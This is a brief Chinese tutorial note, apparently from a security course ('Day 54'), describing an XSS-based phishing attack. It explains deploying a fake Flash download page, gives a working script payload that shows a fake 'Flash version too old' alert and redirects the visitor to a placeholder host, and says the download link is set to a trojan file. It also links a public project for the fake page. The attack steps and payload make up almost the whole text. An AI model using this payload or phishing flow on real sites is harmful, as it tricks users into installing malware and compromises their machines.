第 54 天：网络攻击与防御-XSS 跨站与 Cookie 窃取与表单劫持与网络钓鱼与可追溯性分析与项目平台框架-XSS 跨站 - 攻击利用 - Flash 网络钓鱼

部署可访问的钓鱼页面并修改

点击立即下载后，就会下载木马文件

植入XSS代码等待受害者触发

<script>alert('当前浏览器Flash版本过低，请下载升级！');location.href='http://x.x.x.x/flash'</script>

点击确定后就会来到准备好的钓鱼页面，立即下载地址就可以填木马地址

项目地址：https://github.com/r00tSe7en/Fake-flash.cn